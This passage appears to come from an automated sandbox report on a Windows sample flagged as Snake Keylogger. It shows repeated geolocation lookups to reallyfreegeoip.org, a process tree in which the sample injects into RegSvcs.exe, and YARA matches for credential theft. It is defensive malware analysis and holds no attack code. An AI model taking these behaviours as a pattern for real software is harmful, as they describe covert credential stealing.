                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=5705&min_rtt=5164&rtt_var=2323&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=565453&cwnd=153&unsent_bytes=0&cid=66e3cfc1e17f9e68&ts=252&x=0"
                                                                      2025-01-10 15:46:55 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.649713104.21.16.14436968C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-10 15:46:55 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      2025-01-10 15:46:55 UTC855INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:46:55 GMT
                                                                      Content-Type: text/xml
                                                                      Content-Length: 362
                                                                      Connection: close
                                                                      Age: 1838805
                                                                      Cache-Control: max-age=31536000
                                                                      cf-cache-status: HIT
                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mu2icpIxwJoLwBn41wajm%2BSdxM09awviwiBHqW%2BNYy5btnfJu2Nk8WpfY1JjtKAf8bh1m5XGJo13VxbWt1ED0MwmbuW1UXxJ6YaWFVLPBJ%2BjgfRpW0bpEueUyr11nBcgVbdiyDR7"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8ffdcd7ba9ca1899-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1707&min_rtt=1693&rtt_var=663&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1616832&cwnd=153&unsent_bytes=0&cid=de6d051021ea7579&ts=137&x=0"
                                                                      2025-01-10 15:46:55 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.649720104.21.16.14436968C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-10 15:46:57 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      Connection: Keep-Alive
                                                                      2025-01-10 15:46:57 UTC861INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:46:57 GMT
                                                                      Content-Type: text/xml
                                                                      Content-Length: 362
                                                                      Connection: close
                                                                      Age: 1838806
                                                                      Cache-Control: max-age=31536000
                                                                      cf-cache-status: HIT
                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8jA3BHLI2I01jvJaP616ZEZVmuKGcRvhT1mhWYSET9SJUVXfsCPsVXaHLwvdsf%2Bjqg096RZmgvwzwp55U2%2FILaqCS%2B51CjGviKC%2BjvwozIAK%2BCIhezZFcQtkkgDwEY6%2B0o0xDi1X"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8ffdcd841e5f8ce3-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1976&min_rtt=1896&rtt_var=768&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1540084&cwnd=252&unsent_bytes=0&cid=751f4c7f28c58c8d&ts=160&x=0"
                                                                      2025-01-10 15:46:57 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.649729104.21.16.14436968C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-10 15:46:58 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      2025-01-10 15:46:58 UTC853INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:46:58 GMT
                                                                      Content-Type: text/xml
                                                                      Content-Length: 362
                                                                      Connection: close
                                                                      Age: 1838807
                                                                      Cache-Control: max-age=31536000
                                                                      cf-cache-status: HIT
                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xvz4HxBzo3NUjAMwEkSk19d3kvZPudiAk8O27OIKEplsVtWjdbwW2xNckbi0WJrnuMAglWlft7v8chv73j5GKP741VVdaRs1SP3Bxmog49NC%2B2HWXglteDqT%2B8Fy9MMDu51y6yMs"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8ffdcd8c3c1641ba-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2168&min_rtt=1766&rtt_var=949&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1653454&cwnd=192&unsent_bytes=0&cid=545739481f26e68a&ts=137&x=0"
                                                                      2025-01-10 15:46:58 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.649740104.21.16.14436968C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-10 15:46:59 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      2025-01-10 15:46:59 UTC857INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:46:59 GMT
                                                                      Content-Type: text/xml
                                                                      Content-Length: 362
                                                                      Connection: close
                                                                      Age: 1838809
                                                                      Cache-Control: max-age=31536000
                                                                      cf-cache-status: HIT
                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8li5MSfay7Zw4fCI%2FaxxsJu%2FESMLRUrV6JNIimoTI%2Bwa2YfaNQn0GokMpvncF7WBvKgAdnPXiAXtUAOWPnKJDrw3zXkUQATV2iHbfULbqB81ios7Y%2BsmAXOZ7YtoiZvrIV6h7lu9"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8ffdcd9458f80fa8-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1586&rtt_var=797&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1218697&cwnd=252&unsent_bytes=0&cid=ab1143b333aca574&ts=171&x=0"
                                                                      2025-01-10 15:46:59 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.649752104.21.16.14436968C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-10 15:47:01 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      Connection: Keep-Alive
                                                                      2025-01-10 15:47:01 UTC851INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:47:01 GMT
                                                                      Content-Type: text/xml
                                                                      Content-Length: 362
                                                                      Connection: close
                                                                      Age: 1838810
                                                                      Cache-Control: max-age=31536000
                                                                      cf-cache-status: HIT
                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JhObESFzN7xsutzo6ptfIpu67TlLcWX1VoRKPFjufladm18KJVkpy2UQLmWTAto%2F3Hew0s5Pcncmh3dcqf8frojcFBAd8LxC3PlP9wbCYYUzjBnIHW5gxKnWOonHFUD6XaTDrGAh"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8ffdcd9c9c551899-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1607&rtt_var=604&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1808049&cwnd=153&unsent_bytes=0&cid=6862a3ace4d53d7d&ts=169&x=0"
                                                                      2025-01-10 15:47:01 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.649759104.21.16.14436968C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-10 15:47:02 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      2025-01-10 15:47:02 UTC853INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:47:02 GMT
                                                                      Content-Type: text/xml
                                                                      Content-Length: 362
                                                                      Connection: close
                                                                      Age: 1838811
                                                                      Cache-Control: max-age=31536000
                                                                      cf-cache-status: HIT
                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BFN2KD4J3KyvzekX8uLEAVVqGskraPR4OzPIP9NfOWQI14aUOL3j%2BVoQqBIr97Spv72NyIk920xST%2FDUVUkjkkH9Vz9kDdKdf6H3KK6Jl9Iigl78hfhhhyPoMHnFu2Mp2hGDidVX"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8ffdcda51e6a8ce3-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1867&min_rtt=1867&rtt_var=701&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1558996&cwnd=252&unsent_bytes=0&cid=633f6f66050fd40c&ts=212&x=0"
                                                                      2025-01-10 15:47:02 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      7192.168.2.649771104.21.16.14436968C:\Users\user\AppData\Local\Temp\EmbeddedExe2.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-10 15:47:03 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                      Host: reallyfreegeoip.org
                                                                      Connection: Keep-Alive
                                                                      2025-01-10 15:47:03 UTC852INHTTP/1.1 200 OK
                                                                      Date: Fri, 10 Jan 2025 15:47:03 GMT
                                                                      Content-Type: text/xml
                                                                      Content-Length: 362
                                                                      Connection: close
                                                                      Age: 1838813
                                                                      Cache-Control: max-age=31536000
                                                                      cf-cache-status: HIT
                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V%2Fjha4WJGv3Xul7oJQZhZuL40KbRaSip5j4Uq8hqsAId3zjwUTyHORyfzDscsjffLGAYplGaUt3QQ3r86LiB6kbSjqXuvXMSb319Be1HOMlwstA%2BGTIQGLklOaPLXIbTPA0GdGfl"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8ffdcdad7e3d8ce3-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1864&min_rtt=1864&rtt_var=932&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4236&recv_bytes=699&delivery_rate=134234&cwnd=252&unsent_bytes=0&cid=f5d402d9ea3a3c6b&ts=140&x=0"
                                                                      2025-01-10 15:47:03 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:10:46:47
                                                                      Start date:10/01/2025
                                                                      Path:C:\Users\user\Desktop\8kDIr4ZdNj.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\8kDIr4ZdNj.exe"
                                                                      Imagebase:0x890000
                                                                      File size:2'382'336 bytes
                                                                      MD5 hash:A031DA4BAE8BD9CF87C071C94F67D21B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:2
                                                                      Start time:10:46:49
                                                                      Start date:10/01/2025
                                                                      Path:C:\Users\user\AppData\Local\konked\lecheries.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\8kDIr4ZdNj.exe"
                                                                      Imagebase:0xb60000
                                                                      File size:2'382'336 bytes
                                                                      MD5 hash:A031DA4BAE8BD9CF87C071C94F67D21B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000002.00000002.2180323724.0000000004100000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 66%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:3
                                                                      Start time:10:46:50
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\8kDIr4ZdNj.exe"
                                                                      Imagebase:0x330000
                                                                      File size:45'984 bytes
                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.2191105102.000000000289C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000003.00000002.2183413699.0000000000702000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:4
                                                                      Start time:10:46:51
                                                                      Start date:10/01/2025
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff66e660000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:5
                                                                      Start time:10:46:51
                                                                      Start date:10/01/2025
                                                                      Path:C:\Users\user\AppData\Local\Temp\EmbeddedExe1.exe
